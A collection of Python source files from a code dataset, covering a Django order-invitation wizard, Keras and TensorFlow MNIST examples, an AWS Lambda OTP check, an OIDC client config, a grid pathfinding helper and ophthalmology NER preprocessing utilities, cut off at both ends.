order='invitation')\n\t\t\tif form.is_valid():\n\t\t\t\tself.storage.set_step_data(self.steps.current, self.process_step(form))\n\t\t\t\treturn self.render_next_step(form)\n\t\t\n\t\treturn SessionWizardView.post(self, *args, **kwargs)\n\t\n\tdef render_done(self, form, **kwargs):\n\t\tinvitation = OrderInvitation.objects.get(id=self.kwargs['invitation_id'])\n\t\tfinal_forms = OrderedDict()\n\t\tfor form_key in self.get_form_list():\n\t\t\tif form_key in self.skip_steps:\n\t\t\t\tfinal_forms[form_key] = False\n\t\t\telif form_key == '0':\n\t\t\t\tform_obj = AssignEmployeesForm(self.storage.get_step_data(form_key), request=self.request, order='invitation')\n\t\t\t\tif not form_obj.is_valid():\n\t\t\t\t\treturn self.render_revalidation_failure(form_key, form_obj, **kwargs)\n\t\t\t\tfinal_forms[form_key] = form_obj\n\t\t\telse:\n\t\t\t\tform_obj = self.get_form(step=form_key,\n\t\t\t\t\tdata=self.storage.get_step_data(form_key))\n\t\t\t\tif not form_obj.is_valid():\n\t\t\t\t\treturn self.render_revalidation_failure(form_key, form_obj, **kwargs)\n\t\t\t\tfinal_forms[form_key] = form_obj\n\t\tdone_response = self.done(final_forms.values(), form_dict=final_forms, **kwargs)\n\t\tself.storage.reset()\n\t\treturn done_response\n\t\n\tdef done(self, form_list, **kwargs):\n\t\tself.extra=['1']\n\t\tinvitation = OrderInvitation.objects.get(id=self.kwargs['invitation_id'])\n\t\torder = OrderManager.make_order_from_invitation(self.request, invitation)\n\t\titr = 0\n\t\tfor form in form_list:\n\t\t\titr += 1\n\t\t\tif not form:\n\t\t\t\tcontinue \n\t\t\tif itr == 1:\n\t\t\t\tif form.is_valid() and not form.empty_permitted:\n\t\t\t\t\tfor field, value in form.cleaned_data.items():\n\t\t\t\t\t\tif field == 'employees':\n\t\t\t\t\t\t\tfor employee in value:\n\t\t\t\t\t\t\t\tform.save(order, employee, [])\n\t\t\telif itr == 2:\n\t\t\t\tfor inner_form in form:\n\t\t\t\t\tif inner_form.is_valid():# and not inner_form.empty_permitted:\n\t\t\t\t\t\tinner_form.save(self.request, order)\n\t\t\telse:\n\t\t\t\tif form.is_valid():\n\t\t\t\t\tform.save(order)\n\t\tinvitation.delete()\n\t\treturn redirect('/invitation/' + str(order.id) + '/finished/')\n\t\t","sub_path":"opticon/core/views/invitation.py","file_name":"invitation.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"156591540","text":"import argparse\nfrom htmlmash import load_template\n\nparser = argparse.ArgumentParser(prog='htmlmash', description=\"Process and print template\")\nparser.add_argument(\"template\", help=\"htmlmash template file\")\nargs = parser.parse_args()\ntry:\n template = load_template(args.template)\n print(template)\nexcept FileNotFoundError:\n exit(2)\n","sub_path":"htmlmash/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"195399839","text":"#!/usr/bin/python3\n\nfrom keras import models\nfrom keras import layers\nfrom keras.datasets import mnist\nfrom keras.utils import to_categorical\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\n\nprint(\"Shape of train data: {}\".format(train_images.shape))\nprint(\"Number of train labels: {}\".format(len(train_labels)))\nprint(\"Examples of train labels: {}\".format(train_labels))\n\nprint(\"Shape of test data: {}\".format(test_images.shape))\nprint(\"Number of test labels: {}\".format(len(test_labels)))\nprint(\"Examples of test 
labels: {}\".format(test_labels))\n\n# preprocess data\ntrain_images = train_images.reshape((60000, 28 * 28))\ntrain_images = train_images.astype('float32') / 255\n\ntest_images = test_images.reshape((10000, 28 * 28))\ntest_images = test_images.astype('float32') / 255\n\ntrain_labels = to_categorical(train_labels)\ntest_labels = to_categorical(test_labels)\n\n# build the network\nnetwork = models.Sequential()\nnetwork.add(layers.Dense(512, activation='relu', input_shape=(28 * 28,)))\nnetwork.add(layers.Dense(10, activation='softmax'))\n\n# compile the network\nnetwork.compile(\n optimizer='rmsprop',\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n# train the network\nnetwork.fit(train_images, train_labels, epochs=5, batch_size=128)\n\n# evaluate the network\ntest_loss, test_acc = network.evaluate(test_images, test_labels)\nprint(\"Accuracy on test set: {:.2%}\".format(test_acc))\n","sub_path":"scripts/2.1-a-first-look-at-a-neural-network.py","file_name":"2.1-a-first-look-at-a-neural-network.py","file_ext":"py","file_size_in_byte":1427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"90986742","text":"#encoding:utf-8\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport datetime as dt\nimport numpy as np\nimport pickle as pkl\nfrom functools import partial\n\nEPOCHS = 3\nBATCH_SIZE = 100\nLEARNING_RATE = 0.001\nALPHA = 0.01\n\ndef generator(randomData, alpha, reuse=False):\n with tf.variable_scope('GAN/generator', reuse=reuse):\n h1 = tf.layers.dense(randomData, 256, activation=partial(tf.nn.leaky_relu, alpha=alpha))\n o1 = tf.layers.dense(h1, 784, activation=None)\n img = tf.tanh(o1)\n return img\n\ndef discriminator(img, alpha, reuse=False):\n with tf.variable_scope('GAN/discriminator', reuse=reuse):\n h1 = tf.layers.dense(img, 128, activation=partial(tf.nn.leaky_relu, alpha=alpha))\n D_logits = tf.layers.dense(h1, 1, activation=None)\n D = tf.nn.sigmoid(D_logits)\n return D, D_logits\n\nif __name__ == '__main__':\n tstamp_s = dt.datetime.now().strftime(\"%H:%M:%S\")\n mnist = input_data.read_data_sets('MNIST_DataSet')\n ph_realData = tf.placeholder(tf.float32, (BATCH_SIZE, 784))\n ph_randomData = tf.placeholder(tf.float32, (None, 100))\n gimage = generator(ph_randomData, ALPHA)\n real_D, real_D_logits = discriminator(ph_realData, ALPHA)\n fake_D, fake_D_logits = discriminator(gimage, ALPHA, reuse=True)\n\n d_real_xentropy = tf.nn.sigmoid_cross_entropy_with_logits(logits=real_D_logits, labels=tf.ones_like(real_D))\n loss_real = tf.reduce_mean(d_real_xentropy)\n\n d_fake_xentropy = tf.nn.sigmoid_cross_entropy_with_logits(logits=fake_D_logits, labels=tf.zeros_like(fake_D))\n loss_fake = tf.reduce_mean(d_fake_xentropy)\n\n d_loss = loss_real + loss_fake\n g_xentropy = tf.nn.sigmoid_cross_entropy_with_logits(logits=fake_D_logits, labels=tf.ones_like(fake_D))\n g_loss = tf.reduce_mean(g_xentropy)\n\n d_training_parameter = [trainVar for trainVar in tf.trainable_variables() if 'GAN/discriminator/' in trainVar.name]\n g_training_parameter = [trainVar for trainVar in tf.trainable_variables() if 'GAN/generator/' in trainVar.name]\n d_optimize = tf.train.AdamOptimizer(LEARNING_RATE).minimize(d_loss, var_list=d_training_parameter)\n g_optimize = tf.train.AdamOptimizer(LEARNING_RATE).minimize(g_loss, var_list=g_training_parameter)\n batch = mnist.train.next_batch(BATCH_SIZE)\n save_gimage = []\n save_loss = []\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for e 
in range(EPOCHS):\n for i in range(mnist.train.num_examples//BATCH_SIZE):\n batch = mnist.train.next_batch(BATCH_SIZE)\n batch_images = batch[0].reshape((BATCH_SIZE, 784))\n batch_images = batch_images * 2 - 1\n batch_z = np.random.uniform(-1,1,size=(BATCH_SIZE, 100))\n sess.run(d_optimize, feed_dict={ph_realData:batch_images, ph_randomData:batch_z})\n sess.run(g_optimize, feed_dict={ph_randomData:batch_z})\n train_loss_d = sess.run(d_loss, {ph_randomData: batch_z, ph_realData:batch_images})\n train_loss_g = g_loss.eval({ph_randomData:batch_z})\n print('{0} Epoch={1}/{2}, DLoss={3:.4F}, GLoss={4:.4F}'.format(dt.datetime.now().strftime(\"%H:%M:%S\"), e+1, EPOCHS, train_loss_d, train_loss_g))\n save_loss.append((train_loss_d, train_loss_g))\n randomData = np.random.uniform(-1,1,size=(25,100))\n gen_samples = sess.run(generator(ph_randomData, ALPHA, True), feed_dict={ph_randomData:randomData})\n save_gimage.append(gen_samples)\n with open('save_gimage.pkl', 'wb') as f:\n pkl.dump(save_gimage, f)\n with open('save_loss.pkl', 'wb') as f:\n pkl.dump(save_loss, f)\n tstamp_e = dt.datetime.now().strftime(\"%H:%M:%S\")\n time1 = dt.datetime.strptime(tstamp_s, \"%H:%M:%S\")\n time2 = dt.datetime.strptime(tstamp_e, \"%H:%M:%S\")\n print(\"Start: {0}, End: {1}, Elapsed: {2}\".format(tstamp_s, tstamp_e, (time2 - time1)))\n","sub_path":"mnist_v1/gan_mnist.py","file_name":"gan_mnist.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"285053091","text":"import json\nimport boto3\nimport base64\nfrom botocore.vendored import requests\nfrom boto3.dynamodb.conditions import Key, Attr\n\ndef getName(faceId) :\n dynamo_client = boto3.resource('dynamodb')\n visitors_table = dynamo_client.Table('visitors');\n response = visitors_table.query(KeyConditionExpression=Key('faceID').eq(faceId))\n nameInput = response['Items'][0]['name']\n return nameInput\n\ndef validate_otp(otp):\n if otp==\"\":\n return \"Permission Denied\"\n dynamo_client = boto3.resource('dynamodb')\n visitors_table = dynamo_client.Table('passcodes');\n response = visitors_table.query(IndexName='otp-index', KeyConditionExpression=Key('otp').eq(otp))\n if len(response['Items'])==0:\n return \"Permission Denied\"\n faceID_val = response['Items'][0]['faceId']\n return \"Welcome \"+getName(faceID_val)\n\ndef lambda_handler(event, context):\n print(\"This is the event\", event)\n otp = event['otp']\n # otp = \"124\"\n print(\"This is the otp :\",otp)\n message = validate_otp(otp)\n return {\n 'statusCode': 200,\n 'body': message\n }\n","sub_path":"lambdas/LF0.py","file_name":"LF0.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"292261212","text":"class Model:\n \"\"\" from nanopolish: // as per ONT documents\n scaled_states[i].level_mean = states[i].level_mean * scale + shift;\n scaled_states[i].level_stdv = states[i].level_stdv * var;\n scaled_states[i].sd_mean = states[i].sd_mean * scale_sd;\n scaled_states[i].sd_lambda = states[i].sd_lambda * var_sd;\n scaled_states[i].update_sd_stdv();\"\"\"\n def __init__(self,model_list):\n self.model = {}\n self.kmers = [k[0] for k in model_list]\n self.means = [k[1] for k in model_list]\n self.stds = [k[2] for k in model_list]\n self.model = {kmer:(mean,std) for kmer,mean,std in zip(self.kmers,self.means,self.stds)}\n\ndef extract_model(hdf5,loc='Analyses/Basecall_1D_000/BaseCalled_template'):\n \"\"\"returns template strand 
ONT model as k-mer dict\"\"\"\n location = loc+\"/Model\"\n try:\n kmer_list = [(a[0],a[1],a[2]) for a in hdf5[location].value]\n mod = Model(kmer_list)\n return mod\n except KeyError:\n return None\n\n\n","sub_path":"R7_mCaller/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"1047795","text":"from random import randrange\nimport IPython\n\n#Orthagonal neighbours, not diagnonal\nneighbours = [\n [-1, 0], [1, 0], #X coord neighbours\n [0, -1], [0, 1] #Y coord neighbours\n]\n\nclass Grid:\n \"\"\" A 2D Grid Generator \"\"\"\n\n def __init__(self, size, maxcost=10):\n self.grid = []\n for y in range(size):\n self.grid.append([])\n for x in range(size):\n self.grid[y].append(randrange(0, maxcost))\n\n def __repr__(self):\n outstr = \"\"\n xSize, ySize = self.size()\n for i, line in enumerate(self.grid):\n for j, pos in enumerate(line):\n if (i, j) == (0, 0) or (i, j) == (xSize - 1, ySize - 1):\n outstr += \"^{}^ \".format(str(pos))\n else:\n outstr += \"|{}| \".format(str(pos))\n outstr += \"\\n\"\n return outstr\n\n def repr_path(self, path):\n outstr = \"\"\n for i, line in enumerate(self.grid):\n for j, pos in enumerate(line):\n if (i, j) in path:\n outstr += \"^{}^ \".format(str(pos))\n else:\n outstr += \"|{}| \".format(str(pos))\n outstr += \"\\n\"\n return outstr\n\n def size(self):\n return (len(self.grid), len(self.grid[0]))\n\n\n def __getitem__(self, n):\n return self.grid[n]\n\n def get(self, locTuple):\n assert(isinstance(locTuple, tuple))\n return self.grid[locTuple[0]][locTuple[1]]\n\n def neighbours(self, locTuple):\n assert(isinstance(locTuple, tuple))\n x,y = locTuple\n xSize, ySize = self.size()\n local_neighbours = []\n for xMod, yMod in neighbours:\n xPrime = x + xMod\n yPrime = y + yMod\n if 0 <= xPrime < xSize and \\\n 0 <= yPrime < ySize:\n local_neighbours.append((xPrime, yPrime))\n return local_neighbours\n","sub_path":"python/misc_tests/pyAStar/pyAStar/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"452991172","text":"import urllib2\n\n#url = \"https://www.dropbox.com/s/g34dv4saey56nt6/Illiad%20ex?dl=1\"\nurl = \"https://www.dropbox.com/s/jvvh5a3wdwe7k3o/test?dl=1\"\n#url = \"https://www.google\"\nu = urllib2.urlopen(url)\nmeta = u.info()\nfile_size = int(meta.getheaders(\"Content-Length\")[0])\nif file_size > 100000:\n pass\nl = \"\"\nfile_size_dl = 0\nblock_sz = 8192\nwhile True:\n buffer = u.read(block_sz)\n if not buffer:\n break\n\n l += buffer\n\nl = l.splitlines()\n#O(n^2) but readable\nfor i in list(l):\n stripped = i.strip(\" \")\n if stripped == \"\":\n l.remove(i)\n","sub_path":"anny3/web_file_loader.py","file_name":"web_file_loader.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"50921902","text":"#!/usr/bin/python3\n\n# 1c-moy.py\n# Ask for mark and name then do average and top 5\n# Anthony DOMINGUE\n# 15/10/2018\n\nimport re\n\npattern = '^[A-z]*\\/[0-9]*$' # Regex to check input\ntmp = 0 # Init of tmp variable used to do the average\naverage = 0\ntest_dict = {} # Init of the dictionary with names and marks\n\nuser_entry = input(\"Name/Mark:\")\n\nwhile user_entry != 'q':\n\n while not re.match(pattern, user_entry):\n user_entry = input(\"Invalid input, must be ^[A-z]*\\/[0-9]*$:\")\n\n # If the input 
is valid we can safely split the string into a list \n    name = user_entry.split('/')[0]\n    mark = user_entry.split('/')[1]\n\n    \"\"\"\n    Now we can add the mark to the dictionary with name as keys\n    __ \n   |  | \n   |  | I want to use a dictionary for practice \n   |  | It is not possible to use the same key twice\n   |__| As we use names as keys we cannot use the same name twice\n    __   So if there are two Johns, we must use JohnA and JohnB\n   |__| \n    \n    \"\"\"\n    test_dict[name] = mark\n\n    user_entry = input(\"Name/Mark:\")\n\n# Check if the user gave us at least one name/mark pair\nif len(test_dict) > 0:\n    # Once we have everything we compute the average\n    for name in test_dict:\n        tmp += int(test_dict[name])\n    average = tmp / len(test_dict)\n    print(\"Average is : \", average)\n\n    \"\"\"\n    Here we sort the dictionary (testDict) to order the values (key=testDict.__getitem__)\n    by descending order (reverse=True). It gives us a list of names, and so keys,\n    ordered by the value assigned to the keys in the dictionary\n    \"\"\"\n    names = sorted(test_dict, key=test_dict.__getitem__, reverse=True)\n    i = 0\n\n    # Show the top 5\n    for name in names:\n        if i > 4:\n            break\n        # Here we show the rank with i+1, the name from the list and the value from the dictionary with the name as key\n        print(\"#\", i + 1, \" \", name, \" with \", test_dict[name])\n        i += 1\nelse:\n    print(\"Ciao\")\n","sub_path":"scripts/1c-moy.py","file_name":"1c-moy.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"78501149","text":"PORT = 8090\nBASEURL = \"https://127.0.0.1:{}\".format(PORT)\n\n# If BASE is https these have to be specified\nSERVER_CERT = \"certs/cert.pem\"\nSERVER_KEY = \"certs/key.pem\"\nCA_BUNDLE = None\n\n# This is just for testing and local usage. 
In all other cases it MUST be True\nVERIFY_SSL = False\n\nKEYDEFS = [{\"type\": \"RSA\", \"key\": '', \"use\": [\"sig\"]},\n {\"type\": \"EC\", \"crv\": \"P-256\", \"use\": [\"sig\"]}]\n\nHTML_HOME = 'html'\n\nSECRET_KEY = 'secret_key'\nSESSION_COOKIE_NAME = 'rp_session'\n\nPREFERRED_URL_SCHEME = 'https'\n\nOIDC_KEYS = {\n 'private_path': \"./priv/jwks.json\",\n 'key_defs': KEYDEFS,\n 'public_path': './static/jwks.json'\n}\n\nPUBLIC_JWKS_PATH = '{}/{}'.format(BASEURL, OIDC_KEYS['public_path'])\n\n# # information used when registering the client, this may be the same for all OPs\n#\nDEFAULT_CLIENT_PREFS = {\n \"application_type\": \"web\", \"application_name\": \"rphandler\",\n \"contacts\": [\"ops@example.com\"],\n \"response_types\": [\"code\"],\n \"scope\": [\"openid\", \"profile\", \"email\", \"address\", \"phone\"],\n \"token_endpoint_auth_method\": [\"client_secret_basic\",\n 'client_secret_post']\n}\n\n# Default set if nothing else is specified\nDEFAULT_SERVICES = {\n 'ProviderInfoDiscovery': {}, 'Registration': {},\n 'Authorization': {}, 'AccessToken': {},\n 'RefreshAccessToken': {}, 'UserInfo': {},\n 'EndSession': {}\n}\n\nCLIENT_CONFIG = {\n 'client_preferences': DEFAULT_CLIENT_PREFS,\n 'services': DEFAULT_SERVICES\n}\n\n# The keys in this dictionary are the OPs short user friendly name\n# not the issuer (iss) name.\n# The special key '' is used for OPs that support dynamic interactions.\n\nCLIENTS = {\n # The ones that support web finger, OP discovery and client registration\n # This is the default, any client that is not listed here is expected to\n # support dynamic discovery and registration.\n \"\": CLIENT_CONFIG,\n \"filip\": {\n 'issuer': \"https://guarded-cliffs-8635.herokuapp.com/\",\n \"redirect_uris\": [\"{}/authz_cb/filip\".format(BASEURL)],\n \"post_logout_redirect_uris\": [\"{}/session_logout\".format(BASEURL)],\n \"client_preferences\": DEFAULT_CLIENT_PREFS,\n \"services\": DEFAULT_SERVICES,\n # \"backchannel_logout_session_required\": True,\n \"backchannel_logout_uri\": \"{}/bc_logout\".format(BASEURL)\n },\n \"flop\": {\n 'issuer': \"https://127.0.0.1:5000/\",\n \"redirect_uris\": [\"{}/authz_cb/flop\".format(BASEURL)],\n \"post_logout_redirect_uris\": [\"{}/session_logout\".format(BASEURL)],\n \"client_preferences\": DEFAULT_CLIENT_PREFS,\n \"services\": DEFAULT_SERVICES,\n # \"backchannel_logout_session_required\": True,\n \"backchannel_logout_uri\": \"{}/bc_logout/flop\".format(BASEURL)\n },\n \"filip_local\": {\n 'issuer': \"http://localhost:3000/\",\n \"redirect_uris\": [\"{}/authz_cb/filip_local\".format(BASEURL)],\n \"post_logout_redirect_uris\": [\"{}/session_logout\".format(BASEURL)],\n \"client_preferences\": DEFAULT_CLIENT_PREFS,\n \"services\": DEFAULT_SERVICES,\n # \"backchannel_logout_session_required\": True,\n \"backchannel_logout_uri\": \"{}/bc_logout\".format(BASEURL)\n },\n 'bobcat': {\n 'issuer': 'https://127.0.0.1:8443/',\n \"client_id\": \"client3\",\n \"client_secret\": \"2222222222222222222222222222222222222222\",\n \"redirect_uris\": [\"{}/authz_cb/bobcat\".format(BASEURL)],\n \"client_preferences\": {\n \"response_types\": [\"code\"],\n \"scope\": [\"openid\", \"offline_access\"],\n \"token_endpoint_auth_method\": \"client_secret_basic\"\n },\n \"services\": {\n 'ProviderInfoDiscovery': {}, 'Authorization': {}, 'AccessToken': {},\n 'RefreshAccessToken': {}\n }\n }\n}\n\n# Whether an attempt to fetch the userinfo should be made\nUSERINFO = 
True\n","sub_path":"flask_rp/bc_conf.py","file_name":"bc_conf.py","file_ext":"py","file_size_in_byte":3809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"202284856","text":"#!/usr/bin/env python3\n\"\"\"Test suite for the migrator tool.\"\"\"\n\nfrom argparse import Namespace\nfrom pathlib import Path\nimport shutil\nimport tempfile\nimport unittest\n\nimport migrator\n\n\nclass TestMigrator(unittest.TestCase):\n \"\"\"Test the migrator.\"\"\"\n\n def setUp(self):\n \"\"\"Set up the temp directory to use for the tests.\"\"\"\n self.dir = tempfile.mkdtemp()\n migrator.MIGRATIONS_PATH = Path(self.dir)\n\n def tearDown(self):\n \"\"\"Remove the temp directory we used for the tests.\"\"\"\n shutil.rmtree(self.dir)\n\n def create_test_runner(self, parameters, environment):\n \"\"\"Run create test for a given environment.\"\"\"\n args = Namespace()\n args.name = 'test'\n args.environments = [environment]\n migrator_dir = Path(self.dir, environment)\n migrator_dir.mkdir()\n migrator.create(args)\n expected = \"\"\"def up({0}):\n pass\n\n\ndef down({0}):\n pass\"\"\".format(', '.join(parameters))\n for entry in migrator_dir.iterdir():\n with entry.open() as open_file:\n self.assertEqual(expected, open_file.read())\n\n def test_create_system(self):\n \"\"\"Test the create commmand for system environment.\"\"\"\n parameters = ['config']\n environment = 'system'\n self.create_test_runner(parameters, environment)\n\n def test_create_master(self):\n \"\"\"Test the create command for the master environment.\"\"\"\n parameters = ['config', 'conn']\n environment = 'master'\n self.create_test_runner(parameters, environment)\n\n def test_create_course(self):\n \"\"\"Test the create command for the course environment.\"\"\"\n parameters = ['config', 'conn', 'semester', 'course']\n environment = 'course'\n self.create_test_runner(parameters, environment)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"migration/test_migrator.py","file_name":"test_migrator.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"605465277","text":"class Node:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n def add(self, value):\r\n self.next = Node(value)\r\n\r\n\r\ndef find_middle(node):\r\n print(f\"starting at {node.value}\")\r\n hare = node\r\n tortoise = node\r\n while hare is not None and hare.next is not None:\r\n print(hare.value)\r\n hare = hare.next.next\r\n print(hare.value)\r\n tortoise = tortoise.next\r\n return tortoise\r\n\r\n\r\nnode1 = Node(1)\r\ni = 0\r\ncurrent = node1\r\nwhile i < 50:\r\n current.add(i)\r\n current = current.next\r\n i += 1\r\n\r\nprint(f\"the middle is: {find_middle(node1).value}\")\r\n","sub_path":"linked_list/llmiddle.py","file_name":"llmiddle.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"472155401","text":"import pandas as pd\nimport re \nfrom nltk.tokenize.treebank import TreebankWordTokenizer\nimport numpy as np\nimport ast\nimport string \nimport math\nimport torch \nimport json \n\n#logging function \ndef MyLogger(output_file_path): \n import logging \n import sys\n logger=logging.getLogger() \n logger.setLevel(logging.DEBUG)\n output_file_handler=logging.FileHandler(output_file_path, mode='w')\n stdout_handler=logging.StreamHandler(sys.stdout) \n\n 
logger.addHandler(output_file_handler) \n logger.addHandler(stdout_handler) \n return logger \n\n## turns the oph-ner-preprocess02-tokenizeandlabel.ipynb util functions into a script\n\nclass OphNERDataset(torch.utils.data.Dataset):\n def __init__(self, encodings, labels):\n self.encodings = encodings\n self.labels = labels\n\n def __getitem__(self, idx):\n item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\n item['labels'] = torch.tensor(self.labels[idx])\n return item\n\n def __len__(self):\n return len(self.labels)\n\n##Preprocessing Utils\n\ndef gettokenspanlist(note): \n t = TreebankWordTokenizer()\n tokenspanlist=list(t.span_tokenize(note))\n return tokenspanlist\n \n#find the visual acuity portion of the note \ndef findvaheader(note): \n regex=re.compile(r\"(?i)Visual\\sAcuity[:]?\")\n vaspanlist=[]\n for m in regex.finditer(note): \n vaspanlist.append((m.start(), m.end()))\n try: return vaspanlist[0][0]\n except: return 0\n \ndef findsleheader(note): \n regex=re.compile(r\"(?i)S(lit)?(\\s|-)?L(amp)?(\\s?E(xam)?)?(\\s|:|-)\")\n slespanlist=[]\n for m in regex.finditer(note): \n slespanlist.append((m.start(), m.end()))\n try: return slespanlist[-1][0]\n except: return 0\n \ndef findextheader(note): \n regex=re.compile(r\"(?i)External\")\n extspanlist=[]\n for m in regex.finditer(note): \n extspanlist.append((m.start(), m.end()))\n try: return extspanlist[0][0]\n except: return 0\n\ndef findllheader(note): \n regex=re.compile(r\"(?i)((l(ids)?\\s?(\\/|&|(\\sand\\s))\\s?l(ashes)?))\") \n llspanlist=[]\n for m in regex.finditer(note): \n llspanlist.append((m.start(), m.end()))\n try: return llspanlist[0][0]\n except: return 0\n \n#build function that turns cell into a regex and searches text for it, returning the span of the match \ndef findlabel(regextext, note): \n spanlist=[]\n sleposition = findsleheader(note) \n vaposition = findvaheader(note) \n llposition = findllheader(note)\n startposition = max(sleposition, vaposition, llposition)\n try: \n regextext=str.strip(regextext)\n regex=re.compile(re.escape(\" \"+regextext)) #regex escape? \n except: \n return []\n for m in regex.finditer(note): \n if m.start()+1 >= startposition: \n spanlist.append((m.start()+1, m.end()))\n return spanlist \n \n\n#now we have to match the spans to actual locations of the tokens \n#what do we want to return? the index of the token which starts the match, and the indices of the subsequent tokens\n#version 2: what if the beginning and end of the spanlist don't match the beginning and end of a token\ndef findmatchingtoken(tokenspanlist, spanlist): \n '''\n inputs: \n tokenlist: a list of span tuples identifying starts and ends of tokens\n spanlist: a list of span tuples identifying starts and ends of matches. \n Each tuple could span multiple tokens. Could be multiple tuples indicating multiple matches. 
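For example, token spans [(0, 4), (5, 7)] with a single match span (0, 7) yield the index pair (0, 1).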
\n \n returns: \n a list of tuples indicating start and end indices for matches?\n '''\n \n matchindexlist=[]\n if len(spanlist)==0: \n return []\n else: \n for match in spanlist: \n matchbeg=match[0]\n matchend=match[1]\n #search for match beginning \n for i in range(len(tokenspanlist)): \n tokenspan=tokenspanlist[i]\n if tokenspan[0] <= matchbeg <= tokenspan[1]: \n #save the beginning of the token here \n begindex=i\n #search for match end (starting with match beginning): \n j=begindex\n while j < len(tokenspanlist): \n tokenspan=tokenspanlist[j]\n if tokenspan[0] <= matchend <= tokenspan[1]: \n #save the end of the token here \n endindex=j\n break #stop searching if beg and end found \n j=j+1\n try: \n matchindexlist.append((begindex,endindex))\n except: \n print(match, tokenspanlist)\n if len(matchindexlist)==0: \n return []\n else: return matchindexlist\n \n\n#then given a series of indices which have matches, return the whole sequence of labels\n#how to resolve conflicts? one token span might match more than one label \n#simple version may not do any significant conflict resolution - i.e., pick a random version that works \ndef returnlabels(matchindexlist, tokenlistlabels, name): \n '''\n inputs: \n matchindexlist: a list of indices which match the named entity \n tokenlistlabels: a list of labels (in progress) which need to be labeled with the match \n name: the name of the entity type \n '''\n if len(matchindexlist)>0: \n for match in matchindexlist:\n matchstart=match[0]\n matchend=match[1]\n if tokenlistlabels[matchstart]=='O': #if first available match is \"free\" or unassigned\n tokenlistlabels[matchstart]='B-'+name #label entity start \n if matchend>matchstart: #for multiple token matches, label entity continuation \n for i in range(matchstart+1, matchend+1): \n tokenlistlabels[i]='I-'+name\n break \n else: #if first available match is already assigned, go to the next one \n continue \n return tokenlistlabels \n\ndef initializetokenlistlabels(tokenspanlist): \n tokenlistlabels=['O']*len(tokenspanlist)\n return tokenlistlabels \n \ndef gettokenlistlength(tokenspanlist):\n tokenspanlist=ast.literal_eval(tokenspanlist)\n return len(tokenspanlist)\n \ndef checkfornomatches(doclength, tokenlistlabels): \n tokenlistlabels=ast.literal_eval(tokenlistlabels)\n if tokenlistlabels == [\"O\"]*doclength: \n return True \n else: \n return False \n \ndef countmatches(tokenlistlabels): \n tokenlistlabels=ast.literal_eval(tokenlistlabels)\n return sum('B-' in s for s in tokenlistlabels)\n \n#split long documents into shorter ones of specified size \n#ready to input into sklearn train_test_split for dev splitting off \ndef splitdoc(tokenlist, tokenlistlabels, size=256):\n '''\n inputs: \n tokenlist: a list of list of tokens for the documents\n tokenlistlabels: a corresponding list of list of token labels for the documents \n \n returns: \n list of lists containing the tokens, as well as a list of lists containing the tags\n ready \n n.b. 
In the end we will treat each subdocument as an independent document \n\n '''\n #master lists of lists of tokens and tags \n tokens=[]\n tags=[]\n \n #iterate through each document \n for i in range(len(tokenlist)): \n doc=tokenlist[i]\n labels=tokenlistlabels[i]\n #split up each doc into a list of lists of tokens and tags \n tokenlistbroken=[doc[x:x+size] for x in range(0, len(doc), size)]\n taglistbroken=[labels[x:x+size] for x in range(0, len(labels), size)]\n #tack on the lists of lists into the master lists of lists\n tokens.extend(tokenlistbroken)\n tags.extend(taglistbroken)\n \n return tokens, tags\n\n#propagate labels through a document through its word pieces \ndef fill_labels(doc_labels, doc_offset): \n '''\n inputs: \n encoding offset array for a document (after it passed through Bert WordPieceTokenizer)\n original labels for that document \n outputs: \n new set of labels for the WordPieced document, \n consisting of original labels propagated from head of word to rest of word as appropriate\n '''\n arr_offset = np.array(doc_offset) #turns the list of tuples into an array, 512 rows by 2 columns\n df=pd.DataFrame(data=arr_offset, columns=[\"offset0\", \"offset1\"])\n\n # set labels whose first offset position is 0 and the second is not 0, which means its the first subpart of a word\n selected_label_idx=(arr_offset[:,0] == 0) & (arr_offset[:,1] != 0)\n num_selected_labels=selected_label_idx.sum()\n #sometimes i have too many doc_labels for token heads, which I think happens when the doc gets truncated \n #thus num_selected_labels tells me how many labels i need from the doc_labels \n\n #initialize labels with Nan's \n df[\"labels\"]=np.nan\n #fill selected labels corresponding to wordpiece heads with the original labels \n df.loc[selected_label_idx, \"labels\"] = doc_labels[0:num_selected_labels]\n #special tokens are filled in as 0 \n df.loc[(df[\"offset0\"]==0) & (df[\"offset1\"]==0), \"labels\"]=0\n #the only remaining tokens without labels are word pieces that don't start words\n #we fill those from the previous labels \n #select rows that are odd (start tokens for entities) \n startlabelidx=df.loc[(df[\"labels\"] % 2 == 1)].index\n 